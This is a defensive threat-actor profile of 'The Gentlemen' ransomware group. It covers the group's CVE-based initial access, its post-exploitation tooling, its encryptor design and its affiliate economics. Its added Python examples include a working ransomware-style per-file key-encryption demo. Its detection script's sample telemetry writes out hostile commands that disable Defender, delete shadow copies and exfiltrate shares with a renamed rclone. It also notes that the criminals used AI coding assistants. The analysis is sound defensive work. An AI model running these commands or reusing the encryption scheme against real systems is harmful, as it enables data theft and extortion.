INTEL

The Gentlemen Ransomware: Threat Actor Profile

The Gentlemen emerged publicly in September 2025. By the end of Q1 2026, they held the number-two position globally by published victim volume — ranking behind only Qilin, the group their operators had defected from months earlier. They reached that position in under nine months, using a combination of mass edge-device exploitation, a credential inventory drawn from infostealer logs, and a self-propagating encryptor engineered to prevent bulk decryption.

This is the fourth article in our Pattern-6 threat-actor series, which profiles high-volume criminal groups that use corporate data exposure as an attack vector, leverage mechanism, or revenue source. Previous profiles: Qilin, ShinyHunters, CoinbaseCartel.

Origins: the Qilin split

The group’s two lead operators go by the handles hastalamuerte and zeta88. Both were previously affiliates of the Qilin ransomware-as-a-service programme, operating within what Qilin internally called the ArmCorp affiliate group.

The departure was not settled quietly. On 22 July 2025, hastalamuerte filed an arbitration complaint on the RAMP underground forum against Qilin, claiming approximately $48,000 in unpaid affiliate commissions. RAMP functions as an informal dispute resolution venue for criminal ecosystem disagreements; the filing is on record. Whether the claim resolved is not publicly known.

The first Gentlemen malware sample appeared on 17 July 2025 — five days before the RAMP filing. The group opened affiliate recruitment in September 2025. By that point, they already had infrastructure in place: a leak site, an affiliate management panel, and what analysis later revealed to be a pre-built access inventory of compromised network devices.

Initial access: a pre-built access inventory

The primary initial-access vector is exploitation of CVE-2024-55591 (Fortinet advisory FG-IR-24-535), an authentication bypass in the administrative interface of Fortinet FortiOS and FortiProxy, scored CVSS 9.8 by NVD. The vulnerability was disclosed in January 2025 with in-the-wild exploitation already under way; proof-of-concept code circulated quickly, and mass exploitation of devices with an internet-reachable management interface followed.

What distinguishes The Gentlemen’s approach is the scale of preparation. Analysis of a seized SystemBC command-and-control server, published by Check Point Research in April 2026, found a maintained database of 14,700 compromised FortiGate devices and 969 validated brute-forced FortiGate VPN credentials. Confirmed, catalogued access points held for deployment — not scan results or leads.

That catalogue predates many of the attacks attributed to the group. One documented case involved an SFTP credential captured in 2023 and used in a 2026 intrusion. For any organisation that ran unpatched Fortinet edge devices, the relevant question is whether the device was already compromised in the window between mass exploitation and patch application; current patch status does not answer it. Nor does a clean configuration today: Fortinet's advisory described post-exploitation indicators such as unexpected admin or local user accounts and SSL VPN configuration changes, but an operator who has already harvested the device's VPN credentials and stored them in an inventory has no need to leave those behind.
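
One way to put that question to a device inventory, as an added example rather than anything drawn from the page's sources: each device carries the date its admin or SSL VPN interface first faced the internet, the date it was patched, and the date its credentials were last rotated, and the triage flags patched devices that were exposed before patching and never rotated afterwards. The window-open date of 14 January 2025 (the Fortinet advisory and CISA KEV listing for CVE-2024-55591) is an assumption the reader should confirm against their own records; the device names and dates are constructed.

```python
"""Exposure-window triage: was an edge device internet-facing and unpatched at any
point after mass exploitation began, and were credentials rotated afterwards?
Added example; the inventory below is constructed."""
from __future__ import annotations
from dataclasses import dataclass
from datetime import date

# Assumed anchor (verify against your own records): Fortinet advisory FG-IR-24-535 and the
# CISA KEV entry for CVE-2024-55591, 14 January 2025. The window never closes: catalogued
# access is replayed years later, as the 2023 credential used in 2026 shows.
WINDOW_OPEN = date(2025, 1, 14)


@dataclass
class EdgeDevice:
    name: str
    exposed_since: date            # first day the admin / SSL VPN interface faced the internet
    patched_on: date | None        # None: still running a vulnerable build
    creds_rotated_on: date | None  # last rotation of VPN and local admin credentials


def exposed_days(d: EdgeDevice, today: date) -> int:
    """Days the device was both reachable and unpatched on or after WINDOW_OPEN."""
    start = max(d.exposed_since, WINDOW_OPEN)
    end = d.patched_on or today
    return (end - start).days if end > start else 0


def triage(d: EdgeDevice, today: date) -> tuple[str, int]:
    """Verdict categories: unpatched, clean, rotate_credentials, review_window."""
    days = exposed_days(d, today)
    if d.patched_on is None:
        return "unpatched", days           # assume compromised: isolate, rebuild, rotate
    if days == 0:
        return "clean", 0                  # fixed build in place before any exposure in the window
    if d.creds_rotated_on is None or d.creds_rotated_on < d.patched_on:
        # A rotation done while the device was still vulnerable could be harvested again,
        # so only a rotation after patching counts.
        return "rotate_credentials", days
    return "review_window", days           # rotated; still review config changes and VPN logins


INVENTORY = [  # constructed
    EdgeDevice("fw-ams-01", date(2023, 6, 1), date(2025, 3, 2), None),
    EdgeDevice("fw-ber-02", date(2023, 6, 1), date(2025, 1, 10), None),
    EdgeDevice("fw-lon-03", date(2023, 6, 1), None, None),
    EdgeDevice("fw-par-04", date(2025, 2, 20), date(2025, 2, 20), date(2025, 2, 20)),
    EdgeDevice("fw-mad-05", date(2023, 6, 1), date(2025, 1, 20), date(2025, 2, 1)),
]


def triage_inventory(inventory=INVENTORY, today=date(2026, 5, 31)) -> dict[str, tuple[str, int]]:
    """Verdict per device; the 'today' default is the page's own reporting date."""
    return {d.name: triage(d, today) for d in inventory}


if __name__ == "__main__":
    for name, (verdict, days) in triage_inventory().items():
        print(f"{name}: {verdict} ({days} exposed day(s))")
```

The point of the output is the second category: fw-ams-01 is fully patched and would pass any vulnerability scan, yet it spent 47 days exposed after exploitation began and its credentials have never been rotated, so anything harvested from it is still valid.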

The CVE portfolio has since expanded. Internal communications exposed through the group’s own breach (covered below) confirm two additional vectors in active operational use:

  • CVE-2025-32433 — a critical pre-authentication remote code execution flaw in the Erlang/OTP SSH server, which is embedded in a range of network products including Cisco appliances. A proof-of-concept was shared internally by an affiliate identified as “qbit” and flagged for immediate deployment.
  • CVE-2025-33073 — an NTLM reflection flaw in the Windows SMB client (elevation of privilege by relaying a coerced authentication back to the originating host), operationalised through a tool called RelayKing, which automates domain-wide NTLM relay reconnaissance and credential capture post-foothold.

Beyond direct CVE exploitation, the group uses infostealer credential logs as a parallel initial-access path. Leaked internal communications confirm the use of Snusbase and equivalent log-search platforms to query credential databases derived from commodity malware families including RedLine, Lumma, and Vidar. VPN credentials, Microsoft 365 accounts, Okta SSO tokens, and remote-access services without multi-factor authentication are the target categories.

The credential sourcing operates across two market tiers simultaneously: commodity infostealer logs sold in bulk for a few dollars per record, and the maintained device access inventory built through active CVE exploitation. Initial access to a target can therefore come from a credential captured years earlier by a separate criminal operation — one that has nothing to do with The Gentlemen and that the target organisation is likely unaware of.

If your organisation runs Fortinet edge devices or relies on partner-managed Atlassian or ITSM infrastructure, a Corporate Audit maps what access a group like this could already hold — and through which vector.


Technical execution chain

Once inside a network, the group runs a documented post-exploitation sequence. NetExec handles lateral movement and credential harvesting from domain controllers. Cobalt Strike provides interactive command-and-control, tunnelled through SystemBC — a SOCKS5 proxy implant using a custom RC4-encrypted protocol to conceal C2 traffic from network monitoring.

The pre-encryptor sequence is documented across multiple incidents. PowerShell scripts disable Windows Defender and add folder exclusions before any further tooling runs. Event logs — Security, System, and Application — are cleared as a standard post-exploitation step. EDR termination uses a bring-your-own-vulnerable-driver technique: a legitimately signed driver with a known kernel-mode vulnerability is loaded to kill endpoint detection processes before the encryptor executes, bypassing user-mode controls entirely. Drivers confirmed in use include ThrottleBlood.sys and viragt64.sys.

Browser session harvesting for Microsoft 365 and Okta SSO tokens has been confirmed in Huntress incident reports from April and May 2026, conducted post-foothold and prior to encryption — part of the data collection phase that enables extortion regardless of whether the victim accepts decryption.

Data exfiltration runs through RClone, renamed to avastrclone.exe to avoid process-name detection rules. Staging and transfer precede encryption in all documented incidents.

The encryptor itself is the most technically distinctive element. A Microsoft Security reverse-engineering analysis published on 28 May 2026 identified the following characteristics:

  • Written in Go, obfuscated using Garble, a tool that renames identifiers, strips file paths, build information and other metadata from the binary, and can obfuscate string literals, removing most of the symbol information that static analysis and signature rules rely on
  • Per-file ephemeral key generation: Curve25519 for key exchange, XChaCha20 as the stream cipher. Each file is encrypted under a unique key derived from a fresh ephemeral key pair; in this construction the ephemeral private key is discarded after the key agreement and only the ephemeral public key is stored with the file. Recovering one file key (from memory, for instance) decrypts that file alone, and nothing on the victim's side yields bulk decryption: the only key that re-derives every file key is the operator's private key, which never touches the victim environment
  • Self-propagating: lateral movement and encryptor deployment are integrated into the binary itself. The encryptor targets SMB shares, domain-joined hosts, and network storage without requiring a separate deployment tool
  • A separate C-based locker for ESXi hypervisors, confirmed as a distinct binary from the Go Windows and Linux encryptors — indicating that ESXi environments are a deliberate target, not an incidental one
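
The key hierarchy that list describes, as an added example that is not code from Microsoft's analysis or from the encryptor itself: an X25519 key agreement (the RFC 7748 ladder, written on Python integers so the block is stdlib-only) between a fresh ephemeral key pair and the operator's long-term public key, with the resulting per-file key usable by the victim-side code only while the file is being written. The stream cipher is an HMAC-SHA256 counter keystream standing in for XChaCha20, the blob layout (ephemeral public key, nonce, ciphertext) and the labelled SHA-256 key derivation are this example's own choices, and the file names and contents are constructed.

```python
"""Per-file hybrid encryption of the kind the analysis describes. Added example:
X25519 (RFC 7748 ladder) against the operator's public key with a fresh ephemeral
key pair per file; the per-file key is re-derivable only from the operator's
private key. HMAC-SHA256 counter keystream stands in for XChaCha20."""
from __future__ import annotations
import hashlib
import hmac
import os

P = 2**255 - 19
A24 = 121665
BASEPOINT = (9).to_bytes(32, "little")


def _clamp(scalar: bytes) -> int:
    k = bytearray(scalar)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return int.from_bytes(k, "little")


def x25519(scalar: bytes, point: bytes) -> bytes:
    """Montgomery ladder from RFC 7748 section 5 (not constant-time in Python)."""
    k = _clamp(scalar)
    u = int.from_bytes(point, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, u, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = u * ((da - cb) * (da - cb)) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def _keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR data with HMAC-SHA256(key, nonce || counter) blocks (XChaCha20 stand-in)."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hmac.new(key, nonce + (i // 32).to_bytes(8, "little"), hashlib.sha256).digest()
        out.extend(x ^ y for x, y in zip(data[i:i + 32], block))
    return bytes(out)


def _file_key(shared: bytes, eph_pub: bytes, op_pub: bytes) -> bytes:
    if shared == bytes(32):  # low-order point: refuse, as real implementations do
        raise ValueError("invalid public key")
    return hashlib.sha256(b"example-file-key-v1" + shared + eph_pub + op_pub).digest()


def keygen() -> tuple[bytes, bytes]:
    priv = os.urandom(32)
    return priv, x25519(priv, BASEPOINT)


def encrypt_file(op_pub: bytes, plaintext: bytes) -> tuple[bytes, bytes]:
    """Returns (blob, file_key); blob = eph_pub || nonce || ciphertext. file_key is
    returned only so the demo can show what a responder gains by carving it from
    memory; the encryptor would keep it transient."""
    eph_priv, eph_pub = keygen()
    key = _file_key(x25519(eph_priv, op_pub), eph_pub, op_pub)
    del eph_priv  # from here on, only the operator's private key can rebuild key
    nonce = os.urandom(24)
    return eph_pub + nonce + _keystream_xor(key, nonce, plaintext), key


def decrypt_with_file_key(key: bytes, blob: bytes) -> bytes:
    return _keystream_xor(key, blob[32:56], blob[56:])


def decrypt_file(op_priv: bytes, blob: bytes) -> bytes:
    """The operator's path: rebuild the file key from the stored ephemeral public key."""
    eph_pub = blob[:32]
    op_pub = x25519(op_priv, BASEPOINT)
    return decrypt_with_file_key(_file_key(x25519(op_priv, eph_pub), eph_pub, op_pub), blob)


def demo() -> dict:
    op_priv, op_pub = keygen()  # op_priv stays with the operator, never on the victim
    files = {"a.docx": b"quarterly numbers", "b.xlsx": b"payroll export"}  # constructed
    enc = {name: encrypt_file(op_pub, data) for name, data in files.items()}
    key_a = enc["a.docx"][1]  # suppose a responder carved this one key from memory
    return {
        "keys_differ": key_a != enc["b.xlsx"][1],
        "recovered_key_opens_a": decrypt_with_file_key(key_a, enc["a.docx"][0]) == files["a.docx"],
        "recovered_key_opens_b": decrypt_with_file_key(key_a, enc["b.xlsx"][0]) == files["b.xlsx"],
        "operator_opens_all": all(decrypt_file(op_priv, blob) == files[n] for n, (blob, _) in enc.items()),
    }
```

The `demo()` result is the whole argument in four booleans: the recovered key opens a.docx and nothing else, while the operator's private key opens everything, because each blob carries the ephemeral public key needed to redo the agreement from the operator's side. Scraping keys from the encryptor's memory therefore scales one file at a time, which is why the forensic effort is better spent on the staging and exfiltration phase that precedes it.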

Domain-wide deployment uses Group Policy Objects: a GPO-pushed scheduled task runs the encryptor with SYSTEM privileges across all domain-joined hosts simultaneously. Combined with the self-propagating mechanism in the binary, the interval between encryptor release and full domain encryption is measured in minutes in documented cases.
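
The pre-encryptor sequence above (Defender tampering, BYOVD driver load, event log clearing, renamed RClone, shadow copy deletion, a SYSTEM scheduled task landing on domain hosts) is what a detection engineer would want to correlate rather than alert on piecemeal. The following is an added example, not a vendor rule set: the telemetry is constructed to resemble Sysmon process and driver-load events and Windows Security events, the field names and the two-hour window are this example's conventions, and the S-1-5-18 check on scheduled-task creation (event 4698) and the rclone command-line heuristic are assumptions of the example.

```python
"""Rule-based correlation of the pre-encryptor sequence over sample telemetry.
Added example; events are constructed dicts in a Sysmon/Security-event style."""
import re
from datetime import datetime, timedelta

# Constructed sample: one intrusion spread over a workstation, a file server and a
# domain controller, plus one benign process event at the end.
EVENTS = [
    {"ts": "2026-05-03T01:12:04", "src": "sysmon", "id": 1, "host": "WS-114",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath C:\ProgramData"},
    {"ts": "2026-05-03T01:13:30", "src": "sysmon", "id": 6, "host": "WS-114",
     "image_loaded": r"C:\ProgramData\ThrottleBlood.sys"},
    {"ts": "2026-05-03T01:15:02", "src": "security", "id": 1102, "host": "WS-114"},
    {"ts": "2026-05-03T01:20:11", "src": "sysmon", "id": 1, "host": "FS-01",
     "image": r"C:\ProgramData\avastrclone.exe", "original_file_name": "rclone.exe",
     "cmd": r"avastrclone.exe copy D:\Shares\Finance remote:dump --no-check-certificate --transfers 32"},
    {"ts": "2026-05-03T02:05:40", "src": "sysmon", "id": 1, "host": "DC-01",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2026-05-03T02:06:00", "src": "security", "id": 4698, "host": "WS-114",
     "task_content": r"<Principal><UserId>S-1-5-18</UserId></Principal><Exec><Command>\\corp\SYSVOL\corp\scripts\upd.exe</Command></Exec>"},
    {"ts": "2026-05-03T09:30:00", "src": "sysmon", "id": 1, "host": "WS-220",
     "image": r"C:\Program Files\Git\bin\git.exe", "cmd": "git pull"},
]

KNOWN_BYOVD_DRIVERS = {"throttleblood.sys", "viragt64.sys"}  # the two named in the text
# rclone-style invocation: verb, source, then a named remote ("remote:path"). A Windows
# drive letter ("C:\") fails the lookahead, so plain copy commands do not match. This
# survives renaming of the binary, which a process-name rule does not.
RCLONE_SYNTAX = re.compile(r"\b(copy|sync|move)\s+\S+\s+\w+:(?![\\/])", re.I)


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: dict):
    """Map one event to (rule, ATT&CK technique), or None if it matches nothing."""
    src, eid = ev["src"], ev["id"]
    if src == "sysmon" and eid == 1:
        cmd = ev.get("cmd", "")
        low = cmd.lower()
        if ("set-mppreference" in low and "disablerealtimemonitoring" in low) or \
           ("add-mppreference" in low and "-exclusionpath" in low):
            return ("defender_tampering", "T1562.001")
        if _base(ev["image"]) == "vssadmin.exe" and "delete" in low and "shadows" in low:
            return ("shadow_copy_deletion", "T1490")
        if ev.get("original_file_name", "").lower() == "rclone.exe" and _base(ev["image"]) != "rclone.exe":
            return ("renamed_rclone", "T1567")
        if RCLONE_SYNTAX.search(cmd):
            return ("rclone_transfer", "T1567")
    if src == "sysmon" and eid == 6 and _base(ev["image_loaded"]) in KNOWN_BYOVD_DRIVERS:
        return ("byovd_driver_load", "T1562.001")
    if (src, eid) in {("security", 1102), ("system", 104)}:  # Security / System log cleared
        return ("event_log_cleared", "T1070.001")
    if src == "security" and eid == 4698 and "S-1-5-18" in ev.get("task_content", ""):
        return ("system_scheduled_task", "T1053.005")
    return None


def analyse(events, window=timedelta(hours=2)) -> dict:
    """Collect rule hits and escalate when three distinct stages fall inside one
    window regardless of host: the documented chain spans workstations, file
    servers and domain controllers, so per-host correlation would miss it."""
    hits = []
    for ev in events:
        hit = classify(ev)
        if hit:
            hits.append((datetime.fromisoformat(ev["ts"]), ev["host"]) + hit)
    hits.sort()
    chained = any(
        len({h[2] for h in hits[i:] if h[0] - hits[i][0] <= window}) >= 3
        for i in range(len(hits))
    )
    return {"findings": [(t.isoformat(), host, rule, tech) for t, host, rule, tech in hits],
            "pre_encryptor_sequence": chained}


if __name__ == "__main__":
    for finding in analyse(EVENTS)["findings"]:
        print(*finding)
```

Each rule alone is noisy in a large estate (administrators do add Defender exclusions and delete shadow copies); the escalation condition is what turns them into a single high-confidence finding, and the window should be set from the "minutes, not hours" figure the incident reports give.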

The Gentlemen ransomware attack chain — six phases from initial access to encryption

RaaS structure and affiliate economics

The group operates a ransomware-as-a-service programme with approximately 20 members — the two lead operators and a managed affiliate network recruited through RAMP and BreachForums. The revenue split is 90% to the affiliate, 10% to the operators. A parallel data-only extortion track — exfiltration and publication without encryption — pays affiliates 97%.

These are among the most generous terms in the current RaaS market and function as a deliberate recruitment signal. The structure mirrors how Qilin ran its affiliate programme, suggesting the operators carried institutional knowledge of what incentive terms attract capable affiliates.

Affiliates receive compiled locker binaries for Windows, Linux, and ESXi; the CVE exploitation scripts; the NetExec and BYOVD tooling package; and access to the Cobalt Strike and SystemBC C2 infrastructure. Operational guidance and CVE updates are distributed through the internal communications platform — the same one that was subsequently breached.

Internal chat logs disclosed through the Rocket breach confirm that zeta88 built the affiliate management panel in approximately three days using AI coding assistants, initially using commercially available tools before shifting to Qwen and DeepSeek. The encryptor and locker binaries were partially reverse-engineered from source code and samples of Babuk, Qilin, LockBit 5.0, and Medusa before the custom Go implementation was developed.

In May 2026, following the infrastructure breach described below, the group formalised a partnership with BreachForums. The Gentlemen’s dark web leak site now carries a BreachForums banner; the arrangement provides infrastructure support and a secondary distribution channel in exchange for the association.

Scale: what the leak site does not show

The Gentlemen’s public dark web leak site listed approximately 330–350 named victims as of late May 2026. The actual number of compromised organisations is substantially higher.

The same Check Point analysis of the seized SystemBC C2 server (April 2026) identified 1,570+ compromised organisations in the server’s records, roughly four to five times the public DLS count. Put differently, about 78% of the organisations the server recorded never appeared on the leak site. The most plausible reading is that most of them paid, although an unpublished victim can also be one still in negotiation, or one whose access was catalogued but never monetised. The ratio is consistent with patterns across other high-volume RaaS operations, where the leak site functions as a coercive instrument rather than a complete record.

Check Point’s State of Ransomware Q1 2026 report ranked The Gentlemen second globally by victim volume, behind only Qilin. That ranking uses published victim counts; the adjusted figure, accounting for silent resolutions, is proportionally higher.

The geographic and sectoral spread is broad. Documented victims span Romanian state energy infrastructure, UK technology services, French municipal government, Turkish consumer electronics, Irish telecommunications infrastructure, and US professional services. No consistent sectoral targeting criterion is apparent — the model is opportunistic, driven by access availability rather than vertical selection.

The Gentlemen ransomware: published victims vs estimated total compromised organisations

Adaptavist, Arçelik, and Oltenia: three incidents in context

Adaptavist and Arçelik — the supply-chain pivot

Adaptavist is a UK-headquartered technology services firm and Atlassian Platinum Solution Partner, providing Jira, Confluence, and related tooling to enterprise clients. The company disclosed a breach in April 2026 and appeared on The Gentlemen’s leak site as a claimed victim.

The breach did not end there. The group used access established at Adaptavist to pivot into Arçelik, a Turkish consumer electronics manufacturer with approximately $11.8 billion in annual revenue, whose Atlassian environment Adaptavist managed or supported. Arçelik appeared as a separate claimed victim.

The breach entry point was the service provider, not the target organisation — the partner-tier supply-chain route. Arçelik’s Atlassian environment was reachable because the credentials and access required to manage it resided at Adaptavist. That relationship — partner credentials with client-environment access — rarely appears in client-side attack surface assessments, which enumerate the organisation’s own infrastructure rather than the infrastructure of firms that hold keys into it.

Complexul Energetic Oltenia

On 26 December 2025, The Gentlemen claimed Complexul Energetic Oltenia, a Romanian state-owned coal and electricity generation operator. The incident was independently reported by Romanian media and confirmed as a ransomware event affecting operational systems. Oltenia operates within Romania’s regulated energy infrastructure.

The Rocket breach: internal exposure and aftermath

In early May 2026, the group’s internal communications platform — a Rocket.Chat deployment used as the affiliate management and negotiation backend — was compromised by an external party. The dataset was reportedly sold for $10,000 before being released without charge on MediaFire on 8 May 2026. The released material included approximately 8,200 lines of internal chat logs across a dataset totalling roughly 16 GB.

Check Point Research published an analysis under the title “Thus Spoke The Gentlemen”; KELA Cyber and Group-IB published parallel assessments. The disclosed material included:

  • Operator handles: in addition to hastalamuerte and zeta88, active internal handles included 3NT3R, B1d3n, C0CA, d0wnloAd1, equal1z3r, F3N1X, Gblog88, LDW, n0n3, PRTGRS, and W1Z
  • Negotiation transcript: one disclosed exchange shows an anchor demand of $250,000, settled at $190,000. The structure follows demand-letter convention — anchoring high, conceding to a figure that was the effective floor
  • Payment routing: references to Tinkoff Bank and AML layering services suggest a Russia-adjacent payment infrastructure. Activity timestamps are consistent with Moscow business hours
  • CVE tracking: internal discussion of CVE-2025-32433 and CVE-2025-33073 confirms these as live operational priorities at the time of the breach, not theoretical additions to the toolkit
  • Development tooling: zeta88’s chat logs confirm the affiliate panel was built in approximately three days using AI coding assistants, with a later shift from Western commercial tools to Qwen and DeepSeek

Check Point stated that their findings were shared with law enforcement. No public enforcement action has been confirmed as of late May 2026.

The group’s response was dismissive. Within days they announced a full infrastructure overhaul: new NAS storage with no stated capacity ceiling, a rebuilt internal communication architecture, and evasion additions to the encryptor, specifically NTDLL unhooking (reloading a clean copy of ntdll.dll to strip the user-mode hooks EDR products place on system call stubs), Event Tracing for Windows (ETW) patching to suppress the telemetry those products consume, and removal of hardware breakpoints, which some EDRs use to monitor API calls without inline hooks. They continued posting victims throughout the period. The breach did not interrupt operations.

The Rocket incident produced a volume of primary-source intelligence on an active RaaS operation that is uncommon. It also demonstrated that the group’s operational continuity does not depend on secrecy about their infrastructure. They were exposed, analysed, and became technically harder to detect as a result.

ATT&CK technique reference

The following technique IDs reflect documented behaviour confirmed across vendor incident reports and the Check Point analysis of the Rocket breach materials. They do not include inferred or theoretical capabilities.

  • T1190 — Exploit Public-Facing Application: CVE-2024-55591 (FortiOS/FortiProxy), CVE-2025-32433 (Erlang/OTP SSH on Cisco appliances)
  • T1078 — Valid Accounts: VPN credentials from brute-force campaigns and infostealer log markets; Snusbase confirmed as a sourcing platform
  • T1557.001 — Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay (NTLM relay): CVE-2025-33073, operationalised via RelayKing for domain-wide reconnaissance and credential capture
  • T1059.001 — PowerShell: Defender disable, folder exclusions, pre-execution environment preparation
  • T1562.001 — Impair Defenses: BYOVD kernel-mode EDR termination (ThrottleBlood.sys, viragt64.sys)
  • T1053.005 / T1484.001 — Scheduled Task and Domain Policy Modification (Group Policy): GPO-deployed scheduled tasks for simultaneous domain-wide encryptor execution with SYSTEM privileges
  • T1021 — Remote Services: NetExec for lateral movement across domain-joined hosts
  • T1090 — Proxy: SystemBC SOCKS5 tunnelling with custom RC4-encrypted C2 protocol
  • T1048 / T1567 — Exfiltration: RClone renamed as avastrclone.exe for data staging and transfer prior to encryption
  • T1486 — Data Encrypted for Impact: Go encryptor with Garble obfuscation; per-file XChaCha20 keys derived from per-file ephemeral Curve25519 key pairs
  • T1490 — Inhibit System Recovery: vssadmin.exe shadow copy deletion
  • T1070.001 — Clear Windows Event Logs: Security, System, and Application logs cleared post-exploitation as a standard step

Corporate exposure implications

The pre-built access inventory is the first dimension worth mapping. A catalogue of 14,700 compromised FortiGate devices means that for some organisations, the question is not whether they are currently vulnerable — it is whether their devices were in that catalogue before a patch was applied. Exposure assessments that map external network edge infrastructure against the CVE-2024-55591 exploitation timeline can indicate whether a credential is likely already in circulation, regardless of current patch status.

The credential surface runs parallel. The group’s use of Snusbase and commodity infostealer logs places VPN, M365, and remote-access credentials held in stealer-log markets in direct line of use as initial-access material. This is the same surface mapped in the Qilin, ShinyHunters, and CoinbaseCartel profiles — different groups, same acquisition path. An organisation’s credential exposure in those markets is auditable.

The supply-chain access layer is harder to see from the client side. The Adaptavist incident illustrates that managed Atlassian environments, ITSM tooling, and similar partner-adjacent infrastructure inherit the access risk of the service provider. That risk does not appear in standard attack surface management scans, which enumerate an organisation’s own infrastructure rather than the access privileges held by firms that manage it. For a deeper treatment of this gap, see Third-Party Risk vs Supply Chain Attack.

Sources

Primary analysis and encryptor research

  • Microsoft Security Blog, “The Gentlemen Ransomware: Dissecting a Self-Propagating Go Encryptor,” 28 May 2026
  • Check Point Research, “Thus Spoke The Gentlemen,” May 2026
  • Check Point Research, “When the Ransomware Gang Gets Hacked,” May 2026
  • Check Point Research, DFIR Report: The Gentlemen and SystemBC, April 2026
  • Check Point Research, “The State of Ransomware Q1 2026,” 2026
  • Group-IB, “Hasta la vista, Hastalamuerte: An Overview of The Gentlemen’s TTPs,” 19 March 2026
  • KELA Cyber, “Inside The Gentlemen Leak: Internal Chat Analysis,” May 2026
  • Huntress, “The Gentlemen Ransomware: Defense Evasion TTPs Uncovered,” April–May 2026
  • Halcyon, “Threat Assessment: The Gentlemen Ransomware Group,” May 2026
  • SOCRadar, “Inside The Gentlemen Ransomware Leak,” May 2026

Incident reporting

  • BleepingComputer / SecurityAffairs — Complexul Energetic Oltenia incident, December 2025–January 2026
  • Adaptavist disclosure statement, April 2026
  • ransomware.live — victim tracking data

Vulnerability references

  • National Vulnerability Database — CVE-2024-55591, CVE-2025-32433, CVE-2025-33073
  • MITRE ATT&CK Enterprise Matrix — technique reference IDs

If this is your situation

If this kind of exposure affects your organisation, a Corporate Audit maps the full surface.

